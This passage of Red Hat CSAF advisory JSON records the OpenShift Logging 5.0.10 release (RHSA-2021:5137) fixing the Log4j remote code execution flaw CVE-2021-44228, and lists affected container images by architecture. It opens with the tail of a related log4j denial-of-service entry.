"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern" } ] }
rhsa-2021_5137
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Openshift Logging Security Release (5.0.10)\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Openshift Logging Bug Fix Release (5.0.10)\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5137", "url": "https://access.redhat.com/errata/RHSA-2021:5137" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5137.json" } ], "title": "Red Hat Security Advisory: Openshift Logging Security Release (5.0.10)", "tracking": { "current_release_date": "2024-12-12T01:18:52+00:00", "generator": { "date": "2024-12-12T01:18:52+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5137", "initial_release_date": "2021-12-14T21:36:36+00:00", "revision_history": [ { "date": "2021-12-14T21:36:36+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T21:36:36+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:18:52+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "OpenShift Logging 5.0", "product": { "name": 
"OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0", "product_identification_helper": { "cpe": "cpe:/a:redhat:logging:5.0::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "product": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", "product": { "name": "openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", "product_id": "openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-operator-bundle\u0026tag=v5.0.10-2" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "product": { "name": 
"openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "product": { "name": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "product_id": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-operator-bundle\u0026tag=v5.0.10-2" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "product_identification_helper": { "purl": 
"pkg:oci/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "product": { "name": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "product_id": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "product_identification_helper": { "purl": "pkg:oci/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "product_id": 
"openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "product_id": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "product_id": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v5.0.10-1" } } } ], "category": "architecture", "name": "amd64" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "product": { "name": 
"openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "product_identification_helper": { "purl": 
"pkg:oci/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le", "product": { "name": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le", "product_id": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le", "product_identification_helper": { "purl": "pkg:oci/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "product_id": 
"openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "product_id": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "product_id": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v5.0.10-1" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "product": { "name": 
"openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "product_identification_helper": { "purl": 
"pkg:oci/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "product": { "name": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "product_id": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "product_identification_helper": { "purl": "pkg:oci/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "product_id": 
"openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "product_id": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v5.0.10-1" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "product_id": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v5.0.10-1" } } } ], "category": "architecture", "name": "s390x" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": 
"openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64 as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64" }, "product_reference": "openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64 as a 
component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64 as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64" }, "product_reference": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64 as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x as a component of OpenShift Logging 5.0", "product_id": 
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x" }, "product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64 as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64" }, "product_reference": 
